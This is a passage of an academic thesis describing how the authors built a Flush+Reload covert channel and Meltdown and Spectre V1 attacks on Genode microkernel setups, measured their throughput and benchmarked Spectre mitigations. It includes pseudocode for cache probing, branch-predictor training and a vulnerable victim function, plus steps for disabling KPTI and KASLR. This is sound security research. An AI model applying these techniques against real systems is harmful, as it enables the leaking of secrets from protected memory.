This chapter first presents how the tested system was set up, including how output was obtained, how the kernels were set up with Genode and how they were booted. Second, it presents the design and measurement method used for the Flush+Reload covert channel. Third, the design of the Meltdown and Spectre V1 attacks is presented. Lastly, the methodology for measuring the performance impact of Spectre V1 mitigations is presented.

3.1 Setting up System Under Test

The System Under Test (SUT) is composed of Genode with a microkernel core, an attack implementation and an output channel. This setup was executed on an Intel Core i5-7500 CPU.

We used Genode’s build tools and documentation to build our implementation for each kernel 1. These build tools were available at Genode’s Github page 2. To run a build, Genode requires an init component which is assigned all system resources. Genode then delegates the task of assigning resources to this init component. We built our implementation by assigning an initial resource budget to our process, thus enabling it to execute, use RPC and allocate memory. Figure 3.1 shows how the init process may start and delegate resources to two user processes. From our configuration, Genode’s build tools create files which are used to boot the kernel with our implementation. These files can be used by Grub2 to multi-boot the SUT.

3.1.1 Using x86 Intrinsics

The content of the file /genode-gcc/lib/gcc/x86_64-pc-elf/6.3.0/include/mm_malloc.h was removed because it caused a compiler error. This was needed to allow the use of the header <x86intrin.h>, which provides intrinsics for the rdtsc and lfence instructions.
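To illustrate what <x86intrin.h> is needed for, the sketch below times a single load using the __rdtsc() and _mm_lfence() intrinsics. It is a minimal sketch assuming x86-64 with GCC or Clang; the name timed_load is hypothetical, and it is not the timing function of Section 2.2.2, which follows Paoloni [34].

```c
#include <assert.h>
#include <stdint.h>
#include <x86intrin.h>  /* __rdtsc() and _mm_lfence() with GCC/Clang on x86 */

/* Hypothetical helper: time one load from p in TSC ticks. The lfence before
 * each rdtsc waits for earlier instructions (including the load) to complete,
 * and the lfence after each rdtsc keeps later instructions from starting early. */
static inline uint64_t timed_load(const volatile uint8_t *p)
{
    assert(p);
    _mm_lfence();
    uint64_t start = __rdtsc();
    _mm_lfence();
    (void)*p;                 /* the access being timed (volatile, so it is kept) */
    _mm_lfence();
    uint64_t end = __rdtsc();
    _mm_lfence();
    return end - start;
}
```

The returned value is in TSC ticks, so it is only meaningful relative to thresholds profiled on the same machine.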

1 https://genode.org/documentation/developer-resources/index
2 https://github.com/genodelabs/genode/tree/18.11


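[Figure: the microkernel at the bottom, Genode running on it, the Init component above Genode, and User proc. 1 and User proc. 2 started by Init and communicating via RPC]

Figure 3.1: Overview of Genode’s Hierarchy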

3.1.2 Obtaining Output

Serial communication was used between the system under test and another computer to obtain output from the attacking application, see Figure 3.2. This was necessary because Genode does not include a graphical user interface by default. Instead, the default behavior of Genode is to forward all log events to the serial port.

Configuring the serial port required a modification of Bender. Bender is a small kernel which is used to boot the host kernel. By default, Bender finds a serial port on boot and saves the address of this port to a specific memory address [7]. After that, Bender boots the microkernel and Genode. Genode then reads that address to determine which serial port to forward all logs to.

[Figure: the Test System sends its output over serial communication to the Measuring System, which outputs it to a monitor]

Figure 3.2: The communication setup to retrieve output from the tested system.

Bender did not choose the correct serial port on the tested PC and was therefore modified to select the serial port in use. The Bender version used can be found on Alexander Boettcher’s GitHub page 3.

We changed the file <bender.c> 4 so that com0_port is always set to 0x3f8, which is the address of the serial port on the test PC, as shown by running the command dmesg on Linux. The change made to Bender can be seen in Listings 3.1 and 3.2.

3 https://github.com/alex-ab/morbo/tree/e4744198ed481886c48e3dee12c1fbd47411770f
4 https://github.com/alex-ab/morbo/blob/cb5ec9453af8e7f5d63289aa1884106ce95b4a36/standalone/bender.c



Listing 3.1: Genode’s Default Bender

if (!serial_ctrl.cfg_address && !iobase && serial_ports(get_bios_data_area()) && serial_fallback)
{
    *com0_port = 0x3f8;
    *equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9);
}

Listing 3.2: Genode’s Bender After Applied Changes

/* if (!serial_ctrl.cfg_address && !iobase && serial_ports(get_bios_data_area()) && serial_fallback)
{ */
    *com0_port = 0x3f8;
    *equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9);
//}

3.1.3 Building and Running on Nova

Genode’s build tool created the files hypervisor and image.elf.gz when an application was compiled for Genode+Nova. If an application named "spectre" was compiled, these files were located at:

<genode_build_dir>/var/run/spectre/boot

These files can be used with Grub2 to boot the kernel on bare hardware. Grub2 can be configured to boot Nova by adding the menu entry shown in Listing 3.3, where <boot> is the folder containing hypervisor and image.elf.gz.

Listing 3.3: Grub2 Menu Entry for Nova

menuentry 'Genode Spectre Nova' {
    insmod multiboot2
    insmod gzip
    multiboot2 <...>/bender # Path to modified bender binary.
    module2 <boot>/hypervisor hypervisor iommu nopid novga serial
    module2 <boot>/image.elf.gz image.elf
}

3.1.4 Building and Running on Okl4

Genode’s build tool created the file image.elf when an application was compiled for Genode+Okl4. If an application named "spectre" was compiled, this file was located at:

<genode_build_dir>/var/run/spectre/boot

This file can be used with Grub2 to boot the kernel on bare hardware. Grub2 can be configured to boot Okl4 by adding the menu entry shown in Listing 3.4, where <boot> is the folder containing image.elf.



Listing 3.4: Grub2 Menu Entry for Okl4

menuentry 'Genode Spectre Okl4' {
    insmod multiboot2
    multiboot2 <...>/bender # Path to modified bender binary.
    module2 <boot>/image.elf
}

Our application did not build on Okl4 using the default build file. We added the -march=native flag to compile programs containing assembly instructions. The -march=native flag tells the compiler to generate code for the instruction set of the CPU on which it is compiling 5.

3.1.5 Building and Running on Linux

The output from the Genode application was forwarded from the terminal to the serial port. This was done to use the same measurement methodology as for the two other kernels.

3.1.6 Measuring Throughput

To measure the throughput of the channel or of the attacks, a fixed string message m of length n was transmitted. The throughput T was then calculated as the number of correctly transmitted bytes per second (Bps) of transmission. This definition of throughput has been used to measure other microarchitectural attacks [31, 25]. A byte in position i was considered correctly transmitted if the received byte ri had the same value as the message byte mi. The throughput T was calculated as:

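$$T = \frac{\sum_{i=0}^{n-1} C(m_i, r_i)}{t_n} \tag{3.1}$$

where

$$C(m, r) = \begin{cases} 1 & \text{if } r = m \\ 0 & \text{otherwise} \end{cases}$$

and $t_n$ is the total execution time in seconds, $T$ is the throughput of the channel, and $C(m, r)$ is the function that determines the equality of two bytes.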

A message array of 2048 bytes was used to measure throughput. Every leaked byte was forwarded via serial communication to the measuring system, see Figure 3.2. Each forwarded byte was then compared to the correct byte, see Equation (3.1).
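Equation (3.1) can be computed as in the following minimal C sketch. It assumes the received bytes have already been collected into a buffer of the same length n as the message, with any missing byte stored as a value that does not match; the function name throughput_bps is hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Throughput T of Equation (3.1): correctly received bytes per second.
 * m is the sent message, r the received bytes, both of length n;
 * t_n is the total execution time in seconds. */
static double throughput_bps(const unsigned char *m, const unsigned char *r,
                             size_t n, double t_n)
{
    assert(t_n > 0.0);
    size_t correct = 0;
    for (size_t i = 0; i < n; i++)
        correct += (m[i] == r[i]);   /* C(m_i, r_i): 1 on a match, else 0 */
    return (double)correct / t_n;
}
```

For example, if 3 of 4 bytes arrive correctly within 0.5 s, T = 3 / 0.5 = 6 Bps; incorrect and missing bytes both contribute 0 to the numerator but still consume transmission time.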

Genode’s timer object was used on Nova and Linux to measure the total execution time tn with millisecond accuracy. This required adding timer to build and build_boot_image in the Genode application’s run file. The timer object was not used on Okl4; instead, a timer on the measuring system was used to measure tn. On Okl4, a start-timer command was transmitted via the serial port before the first transmitted byte and an end-timer command after the last byte. The timer on the measuring system was started and stopped by these commands. When Genode’s timer object was used, the execution time tn was transmitted after all bytes had been transmitted.

5 Using the GNU Compiler Collection (GCC): x86 Options. URL: https://gcc.gnu.org/onlinedocs/gcc/x86-Options.html (visited on 2019-03-25).


3.2 Implementing the Flush+Reload Channel

To answer Research Question 1, we first demonstrate that Flush+Reload can be used to create a covert channel between two processes in Genode. To verify the result, we construct two conspiring processes which use Flush+Reload to communicate a message.

Shared memory of size (256 + 2) * Padding bytes was used for the Flush+Reload channel. It contained 256 addresses, one for each possible byte value. These addresses were separated by a padding to prevent prefetching between values. Padding was also used at the beginning and at the end of the array to prevent shared memory addresses from being prefetched by accesses outside of the array.

Figure 3.3 shows how this design is used to transmit a value by caching the corresponding address. The receiver can then measure the access time to each address in the array and conclude which value was transmitted.

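[Figure: a contiguous array with padding at both ends and slots 0, 1, ..., 254, 255; the receiver probes the slots, observes misses and a hit on slot 254, and concludes "254 is the answer!"]

Figure 3.3: A receiver observing access times for a cache hit on a Flush+Reload channel, built on a contiguous padded array.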
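The padded layout reduces to two offset calculations. The sketch below is illustrative only: NUM_VALUES, channel_size and slot_offset are hypothetical names, and it assumes the channel array starts at the beginning of the shared memory region.

```c
#include <assert.h>
#include <stddef.h>

#define NUM_VALUES 256u  /* one slot per possible byte value */

/* Total size: leading padding + 256 slots + trailing padding = (256 + 2) * padding. */
static size_t channel_size(size_t padding)
{
    return (NUM_VALUES + 2u) * padding;
}

/* Offset of the slot encoding value v; slot 0 starts right after the leading padding. */
static size_t slot_offset(unsigned v, size_t padding)
{
    assert(v < NUM_VALUES);
    return ((size_t)v + 1u) * padding;
}
```

With a 4096-byte padding, this places value 0 at 4 kB and value 255 at 1024 kB in a 1,056,768-byte region, consistent with the layout shown in Figure 3.6.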

3.2.1 Measuring Cache Hits

A threshold was used to decide whether a value was cached. This threshold was determined by profiling the time it took for the CPU to access cached and uncached values [48]. Either the L1 cache or the LLC was used depending on the attack design. Therefore, two thresholds were defined: one for L1 cache hits and one for LLC hits.

We assume a memory model of access times as shown in Figure 3.4. In this figure, tLLC is the upper bound for accessing the LLC and tL1 is the upper bound for accessing the L1 cache. The thresholds tLLC and tL1 are chosen as the upper bound of the measurements for the LLC and L1 cache respectively. This choice was made arbitrarily, with the intent of minimizing false positives while preserving true positives. The time to access a value was measured using the timing function described in Section 2.2.2. To profile uncached accesses, an array of size 4096 × (256 + 2) bytes was used, with an internal padding of 4096 bytes to prevent prefetching.

The time of accessing uncached values was measured by first removing the array from the cache using clflush and then measuring the time for accessing each address. A similar method was used to measure the timings for the L1 cache, the difference being that the values were cached in the same process before the access was timed.

Two processes were used to measure the access times to the LLC: one process which cached the values and one process which timed the accesses, see Figure 3.5. If the two processes get scheduled on the same core, the values may be cached in either the L1 cache or the LLC.

[Figure: the memory levels L1, LLC and DRAM ordered by increasing access time, with tL1 and tLLC marking the upper bounds of the L1 and LLC access times]

Figure 3.4: A model of memory access times for different memory levels.

[Sequence diagram between the Measuring Process and the Caching Process: RPC_shared_memory() returns Shared_memory_cap; a loop then contains the steps Lock, Cache current index, Unlock, Flush current value, Tell caching process to start, Wait for unlock and Measure fetch time]

Figure 3.5: A sequence diagram for measurements of the LLC access times.


The in-order loop in Listing 3.5 triggers the CPU to prefetch addresses before they are accessed, which results in false-positive cache hits for subsequent values. Listing 3.6, on the other hand, flushes all possible values and then measures the access times in a permuted order to prevent data prefetching.

Listing 3.5: Flush+Reload

for i in 0..255
    clflush(address + i*Padding)   // Flush channel from cache
wait_for_read()                    // Wait for reloading process
for i in 0..255
    time(address + i*Padding)      // Test value for cache hit



Listing 3.6: Flush+Mix

for i in 0..255
    clflush(address + i*Padding)   // Flush channel from cache
wait_for_read()                    // Wait for reloading process
for i in 0..255
    m = (i * a + b) % 256          // a and 256 relatively prime
    t = time(address + m*Padding)  // Test value for cache hit
    if t <= LLC_THRESHOLD          // threshold is the upper bound of LLC hits
        cache_hits += 1

The offset Padding is used as internal padding to prevent prefetching between values. 4 kB was chosen as the largest internal padding, since it is the page size on the tested system and the CPU does not prefetch across page boundaries [24, 10]. An example of the array used for the channel with 4 kB internal padding is shown in Figure 3.6.

[Figure: leading padding starting at 0 kB, value 0 at 4 kB, value 1 at 8 kB, ..., value 254 at 1020 kB, value 255 at 1024 kB, and trailing padding at 1028 kB]

Figure 3.6: Leak Array Layout
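Since the CPU does not prefetch across page boundaries, what matters for a given padding is whether two value slots share a 4 kB page. The sketch below checks this under the assumption that the channel array is page aligned and slot v starts at (v + 1) * padding; same_page and CHANNEL_PAGE_SIZE are hypothetical names.

```c
#include <stdbool.h>
#include <stddef.h>

#define CHANNEL_PAGE_SIZE 4096u  /* page size on the tested system */

/* True if the slots for values v and w start in the same page. */
static bool same_page(unsigned v, unsigned w, size_t padding)
{
    return ((size_t)v + 1u) * padding / CHANNEL_PAGE_SIZE ==
           ((size_t)w + 1u) * padding / CHANNEL_PAGE_SIZE;
}
```

With a 4096-byte padding no two slots share a page, while with 256 bytes up to 16 consecutive slots do, which is why the access order of Listing 3.6 matters at smaller paddings.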

SRGs were tested for how well they prevent prefetching, where the best performance means no detected cache hits when looping over an uncached array. The SRGs use the modulus 256, and a and b in Listing 3.6 are chosen according to the scheme in Section 2.3.2. Each SRG is evaluated by iterating over the array 256 times using the indices it generates. Each access time is measured and checked for a cache hit, as described in Section 3.2.1. The SRGs were further evaluated for the padding sizes 4096, 2048, 1024, 512, 256 and 128 bytes. The limits 4096 and 128 were used as they are the page size and cache line size on the tested system. Consequently, the CPU does not prefetch for padding sizes over 4096 bytes, and padding below 128 bytes does not guarantee separation between values.

All SRGs with a ∈ [1, 255] and b = 0 were evaluated. The offset b = 0 was chosen because a constant offset should not affect prefetching, and to limit the number of SRGs to evaluate. Two SRGs are presented: the one with the best performance in Equation (3.2), and an arbitrarily chosen worse SRG in Equation (3.3). The latter illustrates the characteristics of a poorly performing SRG.

$$m_i = (49i + 0) \bmod 256 \tag{3.2}$$

$$m_i = (33i + 0) \bmod 256 \tag{3.3}$$
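A basic requirement on any SRG of this form is that the 256 iterations probe every slot exactly once. The sketch below checks that property; srg_index and srg_is_permutation are hypothetical helper names. For m_i = (a·i + b) mod 256, the map is a permutation exactly when a is invertible modulo 256, that is, when a is odd.

```c
#include <stdbool.h>

/* Index sequence m_i = (a * i + b) mod 256 from Equations (3.2) and (3.3). */
static unsigned srg_index(unsigned a, unsigned b, unsigned i)
{
    return (a * i + b) % 256u;
}

/* True if i = 0..255 visits each of the 256 slots exactly once. */
static bool srg_is_permutation(unsigned a, unsigned b)
{
    bool seen[256] = {false};
    for (unsigned i = 0; i < 256u; i++) {
        unsigned m = srg_index(a, b, i);
        if (seen[m])
            return false;     /* some slot would be probed twice, another never */
        seen[m] = true;
    }
    return true;
}
```

Both a = 49 and a = 33 pass this check, so being a permutation alone does not explain the difference between them. The sketch only rules out SRGs that skip values.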

3.2.3 Adapting the Channel to Targeted Kernels

Implementation of Flush+Reload required some adaptations depending on the intended target. One adaptation was that the rdtsc instruction was used instead of rdtscp, as rdtscp resulted in a crash on Nova. Thus, the timer recommended by Paoloni [34] was used for Linux and Okl4, see Listing 2.2, while the alternative timer suggested by Paoloni was used for Nova, see Listing 2.3.

3.2.4 Measuring Throughput of the Covert Channel

The throughput of the covert Flush+Reload channel was measured both between two processes, see Figure 3.7, and within a single process. The throughput was measured as described in Section 3.1.6.

[Sequence diagram between the Receiver and the Transmitter: RPC_shared_memory() returns Shared_memory_cap; a loop then contains the steps Lock, Cache current data, Unlock, Flush all 256 values, Tell caching process to start, Wait for unlock, Measure fetch time for index 0..255 and Log index corresponding to first LLC hit]

Figure 3.7: A sequence diagram of Flush+Reload communication between two processes.

The throughput for communication within a process was measured using a process which first flushed the leak array from the cache, then cached the current value and used lfence to wait for the transmitted byte to be cached. The process then iterated over all values in the leak array to check for an L1 cache hit. The throughput was then measured using the method described in Section 3.1.6.

3.2.5 Reducing Noise

To obtain a reliable Flush+Reload channel, it may be necessary to make multiple measurements, as done by others [31, 25]. R measurements, mij, were taken for each value i to increase accuracy. A cache-hit detection function fc with a threshold tc was used to build a histogram H of recorded cache hits, where each entry hi is the number of detected cache hits for value i. The estimate v̂ of the transmitted value v was calculated as:

$$\hat{v} = \arg\max_{i \in \{0, \dots, 255\}} h_i$$

where

$$h_i = \sum_{j=0}^{R-1} f_c(m_{ij})$$

and

$$f_c(x) = \begin{cases} 1 & \text{if } x \le t_c \\ 0 & \text{otherwise} \end{cases}$$
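The histogram estimate above can be sketched in C as follows. This is a minimal illustration, not the thesis implementation: estimate_value and is_hit are hypothetical names, the timings are assumed to be stored round by round in a flat array, and returning -1 when no slot was ever hit (a missing byte) is a choice made for this sketch.

```c
#include <stddef.h>
#include <stdint.h>

/* f_c: a measurement counts as a hit when it is at or below the threshold t_c. */
static unsigned is_hit(uint64_t cycles, uint64_t t_c)
{
    return cycles <= t_c;
}

/* Estimate the transmitted value from R rounds of timings. times is a flat
 * R x 256 array: times[j * 256 + i] is measurement j of value i (m_ij).
 * Returns the arg max of the hit histogram (ties go to the lowest index),
 * or -1 if no value was ever hit. */
static int estimate_value(const uint64_t *times, size_t R, uint64_t t_c)
{
    unsigned h[256] = {0};              /* histogram H: h[i] = hits for value i */
    for (size_t j = 0; j < R; j++)
        for (size_t i = 0; i < 256; i++)
            h[i] += is_hit(times[j * 256 + i], t_c);

    size_t best = 0;
    for (size_t i = 1; i < 256; i++)
        if (h[i] > h[best])
            best = i;
    return h[best] > 0 ? (int)best : -1;
}
```

A single spurious hit on a wrong value is outvoted as long as the correct value is hit in more of the R rounds.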

In addition, synchronization was needed to increase the probability of a successful transmission. Locking was used to synchronize the transmitter with the receiver.


3.3 Implementing Meltdown

The methodology for Meltdown was based on the PoC by Lipp et al. [31]. Specifically, Meltdown required methods for recovering from a segmentation fault, identifying a target address, obtaining an observable result via a Flush+Reload channel and synchronizing the transmitter with the receiver. Additionally, KPTI had to be disabled on the Linux kernel for the attack to work.

3.3.1 Recovering from Segmentation Fault

Since Genode does not provide support for segmentation fault handlers [7], another method was needed. One possible method is to start a new child process for each read that leads to a segmentation fault [31]. This method allows a single byte to be transmitted by each started child. Another method is to use Intel TSX to suppress the fault [31]. Both methods were evaluated; Intel TSX was chosen because of its more straightforward attack design and lower resource requirements.

[Sequence diagram for the Server: a loop with the steps Use TSX to cache current data, Measure fetch time for index 0..255, and Log index corresponding to first LLC hit]

Figure 3.8: A sequence diagram of Meltdown using Intel TSX and Flush+Reload.

If Intel TSX is used, no inter-process synchronization is needed. When inaccessible memory is accessed inside a transaction, the transaction aborts instead of raising a fault, and the process continues its execution. The attacker can therefore run Flush+Reload directly after the Meltdown attack, see Figure 3.8.

3.3.2 Disabling Mitigations

Because of the significant performance impact of KPTI, some kernels allow opting out of these security patches 6. The KPTI mitigation can be disabled in Ubuntu+Linux by adding the flag pti=off to the kernel boot parameters in the file </etc/default/grub>. To simplify the Meltdown attack on Linux, KASLR can be disabled with nokaslr, which prevents random placement of kernel space at boot.

3.3.3 Choosing a Target Address

Two targets were used: the Linux version banner and a victim process. Previous work has had success with these variants 7 8. Furthermore, they were chosen because success is easy to confirm using an existing working attack.

6 Ubuntu. MitigationControls - Ubuntu Wiki. 2018. URL: https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown/MitigationControls (visited on 2019-02-05).

7 https://github.com/paboldin/meltdown-exploit
8 https://github.com/IAIK/meltdown


In the first alternative, the attacker targets the location of a version string defined in the Linux kernel. The leaked data was confirmed to be correct by reading a file with root privileges.

For the second alternative, a victim process was set up to allocate a secret array of 2048 bytes. Its physical address was calculated using tools published by Lipp et al. 8. The array was cached by the victim. Thereby, the target addresses and their values are known, and the values are cached. The throughput of the attack could thereafter be measured using the method described in Section 3.1.6.

3.4 Implementing Spectre

The overall design of the Spectre V1 attack was based on previous work 9 10, see Figure 3.9. Specifically, methods for ensuring speculative execution, training the branch predictor and increasing accuracy by tuning parameters were used.

[Sequence diagram between the Server and the Attacker: RPC_shared_memory() returns Shared_memory_cap; a training loop with Flush all 256 values and victim_function(x), which accesses arr[x]; then victim_function(malicious), Measure fetch time for index 0..255, and Log index corresponding to first LLC hit]

Figure 3.9: A sequence diagram of Spectre using Flush+Reload.

The attack setup consisted of a victim process and an attacker which shared a common output buffer. The victim was a vulnerable RPC which accessed an array based on an input index and a bounds check, see Listing 3.7. The attacker exploits this by issuing Ta - 1 training requests to victim_function. After Ta - 1 requests, the attacker issues a malicious request, malicious = target_address, with an index targeting an address beyond the bounds of the array. For the attack to work, the branch predictor needs to be trained and the vulnerable RPC needs to be executed speculatively.

Listing 3.7: Victim Function which is Vulnerable to Spectre V1

void victim(size_t idx) {
    if (idx < array_size) {      // array_size is not in cache, so the
        int foo = array[idx];    // body may be executed speculatively
        do_something(foo);
    }
}

9 https://gist.github.com/anonymous/99a72c9c1003f8ae0707b4927ec1bd8a
10 https://github.com/crozone/SpectrePoC



3.4.1 Ensuring Speculative Execution

Speculative execution, according to Intel, is highly dependent on the microarchitectural implementation and may vary across processor families [19]. Kocher et al. [24] state that one trigger for speculative execution is a cache miss prior to or during the evaluation of a branch condition. Therefore, the values used in the bounds check need to be evicted from the cache.

A heuristic flush of the cache was done by performing many memory accesses, see Listing 3.8. CACHE_LINE_SIZE was set to the targeted hardware’s cache line size of 64 bytes. This size was retrieved using the command getconf LEVEL1_DCACHE_LINESIZE on Xubuntu 18.04 LTS.

Listing 3.8: Heuristic Flush of Non-Shared Condition Variable

void heuristic_flush() {
    for (size_t i = 0; i < Hs; i += CACHE_LINE_SIZE)
        large_array[i];            // large_array must be volatile, or this read may be optimized away
}
void speculative_execution(size_t idx) {
    heuristic_flush();             // Fill cache with garbage
    _mm_lfence();                  // Ensure flush executes before victim
    victim(idx);                   // Condition variable is hopefully evicted
}
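On the Linux host, the line size reported by getconf can also be read programmatically. The sketch below is an assumption-laden illustration: it relies on the glibc extension _SC_LEVEL1_DCACHE_LINESIZE and falls back to the 64 bytes reported on the tested machine when that constant is unavailable; cache_line_size is a hypothetical name, and this is not expected to work inside Genode itself.

```c
#include <unistd.h>

/* L1 data cache line size in bytes on a Linux host. _SC_LEVEL1_DCACHE_LINESIZE
 * is a glibc extension; if it is unavailable or reports 0, fall back to the
 * 64 bytes reported on the tested i5-7500. */
static long cache_line_size(void)
{
#ifdef _SC_LEVEL1_DCACHE_LINESIZE
    long size = sysconf(_SC_LEVEL1_DCACHE_LINESIZE);
    if (size > 0)
        return size;
#endif
    return 64;
}
```

Querying the value rather than hard-coding it keeps the heuristic flush stride correct if the code is moved to a CPU with a different line size.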

3.4.2 Configure Variables for Spectre

Some parameters needed to be chosen before evaluating the attack throughput: first, two parameters for training the branch predictor, and second, a parameter for flushing the cache.

Training the branch predictor meant polluting the BTB, which is a type of cache [19]. This was done in a similar manner to polluting the LLC: by repeatedly committing values to the cache, i.e., branching to the desired location, see Listing 3.9. As described in Section 2.5.1, the value against which the condition is checked needs to be flushed from the cache to trigger speculative execution of the incorrect branch. At this stage, the condition value was part of the shared memory so that the attacker could flush it.

Three parameters were needed to execute the Spectre attack: the number of attacks per measurement Na, the attack period Ta and the number of memory accesses used to flush the cache Hs. Na and Ta were chosen by testing all integer combinations with Na ∈ [1, 10] and Ta ∈ [2, 10] to find which combination gave the highest throughput when reading 2048 bytes from the vulnerable process. While Na and Ta were being determined, Hs was set to 4096 × 32; Hs was then tested using an exponential sample between 64 and the size of the CPU’s cache to find a local optimum. It should be noted that the purpose of these local optimizations is not to achieve an optimum, but rather to gauge the possible throughput of this attack.

where

Na: number of attacks per measurement
Ta: attack period
Hs: number of accesses in the heuristic flush    (3.4)
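The search described above is an exhaustive grid over Na and Ta followed by a doubling sweep over Hs. The sketch below shows that structure only. The measurement hook measure_fn is hypothetical and stands for running the attack and returning its throughput, and toy_measure is an arbitrary stand-in used to exercise the search; its peak is not measured data.

```c
#include <assert.h>

/* Hypothetical hook: run the attack with these parameters, return throughput in Bps. */
typedef double (*measure_fn)(int na, int ta, long hs);

struct spectre_params { int na; int ta; double bps; };

/* Exhaustive search over Na in [1, 10] and Ta in [2, 10] for a fixed Hs. */
static struct spectre_params best_na_ta(measure_fn measure, long hs)
{
    assert(measure);
    struct spectre_params best = {1, 2, -1.0};
    for (int na = 1; na <= 10; na++)
        for (int ta = 2; ta <= 10; ta++) {
            double bps = measure(na, ta, hs);
            if (bps > best.bps)
                best = (struct spectre_params){na, ta, bps};
        }
    return best;
}

/* Exponential sample of Hs: 64, 128, 256, ... up to cache_bytes. */
static long best_hs(measure_fn measure, int na, int ta, long cache_bytes)
{
    assert(measure && cache_bytes >= 64);
    long best = 64;
    double best_bps = -1.0;
    for (long hs = 64; hs <= cache_bytes; hs *= 2) {
        double bps = measure(na, ta, hs);
        if (bps > best_bps) {
            best_bps = bps;
            best = hs;
        }
    }
    return best;
}

/* Toy stand-in for a real measurement; its peak at Na = 2, Ta = 5,
 * Hs = 4096 is arbitrary and only exercises the search. */
static double toy_measure(int na, int ta, long hs)
{
    long ratio = hs > 4096 ? hs / 4096 : 4096 / hs;  /* equals 1 only at hs = 4096 */
    return 1000.0 - (na - 2) * (na - 2) - (ta - 5) * (ta - 5) - (double)ratio;
}
```

Because Hs is held fixed while Na and Ta are searched and only then swept, the result is a local optimum, in line with the stated purpose of gauging rather than maximizing throughput.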

To modify the contents of the BTB during training, non-branching bit operations were used in place of an explicit branch, see Listing 3.10. Lines 4 and 5 yield x = 0xFFFFFFFF if (i % Ta == 0) and x = 0x00000000 otherwise. Line 6 then evaluates to x = malicious if (i % Ta == 0) and x = train otherwise.



Listing 3.9: Training the Branch Predictor

void spectre() {
    heuristic_flush();
    for (int i = Ta - 1; i >= 0; --i) {
        if (i % Ta == 0)
            victim_function(malicious_x);  // Ta:th iteration
        else
            victim_function(x);            // Training
    }
}

Listing 3.10: Training the Branch Predictor Without Explicit Branch

1  void spectre() {
2      heuristic_flush();
3      for (int i = Ta - 1; i >= 0; --i) {
4          x = ((i % Ta) - 1) & ~0xffff;           // Prevent jumps
5          x = (x | (x >> (sizeof(int) * 4)));     // and use
6          x = train ^ (x & (malicious ^ train));  // malicious x every
7          victim_function(x);                     // Ta:th iteration
8      }
9  }
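The selection arithmetic of lines 4 to 6 can be checked in isolation. The sketch below is a hypothetical helper, select_index, that applies the same bit operations to a size_t instead of an int (so the shifts act on an unsigned type); it contains only the index selection, not the victim call.

```c
#include <assert.h>
#include <stddef.h>

/* Branch-free choice between the training and malicious index, using the
 * bit operations of lines 4-6 of Listing 3.10 on size_t. Returns malicious
 * when i % ta == 0 and train otherwise (requires ta <= 65537). */
static size_t select_index(size_t i, size_t ta, size_t train, size_t malicious)
{
    assert(ta > 0 && ta <= 65537);
    size_t x = ((i % ta) - 1) & ~(size_t)0xFFFF; /* high bits all set iff i % ta == 0 */
    x = x | (x >> 16);                           /* x is now either all ones or 0 */
    return train ^ (x & (malicious ^ train));    /* all ones -> malicious, 0 -> train */
}
```

When i % ta == 0, the subtraction wraps to all ones; otherwise it yields a small value that the mask clears to 0. The final XOR then picks one of the two indices without a conditional jump.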


The vulnerable process contained an array of size 16 + 2048 bytes. The first 16 bytes were accessible via RPC and were used for training. The attacker then used Spectre V1 with Flush+Reload to read the last 2048 bytes of the array and forwarded the values to the measuring system. From there, the method described in Section 3.1.6 was used to measure the throughput.

3.4.4 Measuring Impact of Mitigations

Two mitigations were applied to Spectre V1: first, preventing speculative execution using lfence, see Listing 2.6; second, index masking as used in Linux, see Listing 2.8. The performance impact of each mitigation was tested by measuring the execution time of the RPC before and after applying it. The execution time was measured using the method described in Section 2.2.2.
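For readers without Listing 2.8 at hand, the sketch below shows the idea behind index masking: a mask that is all ones for an in-bounds index and zero otherwise, computed without a branch, so that a mispredicted bounds check still reads in bounds. It is modeled on the generic C fallback of array_index_mask_nospec() in Linux’s include/linux/nospec.h, but it is a simplified assumption-based sketch. Linux also hides the index from the optimizer and uses an assembly version on x86, and both are omitted here. The names index_mask and masked_read are hypothetical.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

#define BITS_PER_LONG (sizeof(long) * CHAR_BIT)

/* ~0UL if index < size, else 0, computed without a conditional branch.
 * Assumes index and size are at most LONG_MAX and that >> on a negative
 * long is an arithmetic shift (true for GCC and Clang). */
static unsigned long index_mask(unsigned long index, unsigned long size)
{
    return (unsigned long)(~(long)(index | (size - 1UL - index)) >> (BITS_PER_LONG - 1));
}

/* Hypothetical bounds-checked read: even if the branch is mispredicted,
 * an out-of-bounds idx is masked to 0, so array[idx] stays in bounds. */
static int masked_read(const int *array, size_t array_size, size_t idx)
{
    assert(array && array_size > 0);
    if (idx < array_size) {
        idx &= index_mask(idx, array_size);
        return array[idx];
    }
    return -1;  /* out-of-bounds marker for this sketch only */
}
```

Unlike an lfence, the mask does not stall the pipeline. It only adds a few arithmetic instructions on the data path, which is one reason the two mitigations can differ in measured RPC overhead.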


4 Results

The results for the covert Flush+Reload channel, along with its design parameters, are presented in Section 4.1 and are intended to answer Research Question 1. The throughput of the Meltdown attack on Genode+Linux, intended to answer Research Question 3, is presented in Section 4.2 for two different victims. The throughput of the Spectre V1 attack is presented together with RPC benchmarks for its mitigations in Section 4.3. These results are intended to answer Research Questions 2 and 4 respectively.

4.1 Flush+Reload

The results of choosing thresholds for the different kernels and attacks are shown in Section 4.1.1. The results related to preventing prefetching are shown in Section 4.1.2. Section 4.1.3 shows the throughput of the covert channel and answers Research Question 1. Section 4.1.4 shows the results of reducing noise.

4.1.1 Choosing Cache-Hit Thresholds

Figures 4.1 to 4.3 show the times taken to access values stored in the LLC, values stored in the L1 cache, and uncached values. These access times were measured using the timing function described in Listing 2.2. Three distinct levels of memory access times can be seen, and a high-resolution timer can distinguish them from each other. A memory access can thus be attributed to the L1 cache, the LLC or DRAM.

Table 4.1 shows the choices of tLLC and tL1 for each kernel along with a valid interval for each choice. The valid interval is the range of thresholds that lies at or above all measurements from the desired cache level and below all measurements from the next, slower level. For example, there are no LLC measurements below 73 cycles on Okl4. Thus, the valid interval for tL1 on Okl4 is [56, 72]. tLLC and tL1 were chosen as the upper bound of the measurements for the LLC and L1 cache respectively.
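The threshold choice and the valid interval can be computed directly from profiled samples. In the sketch below, pick_threshold and valid_interval are hypothetical names, and the test data are synthetic values chosen to mirror the shape of the Okl4 example above, not measurements.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct interval { uint64_t lo, hi; };  /* inclusive range of cycles */

/* Threshold = upper bound (maximum) of the profiled access times of one level. */
static uint64_t pick_threshold(const uint64_t *samples, size_t n)
{
    assert(samples && n > 0);
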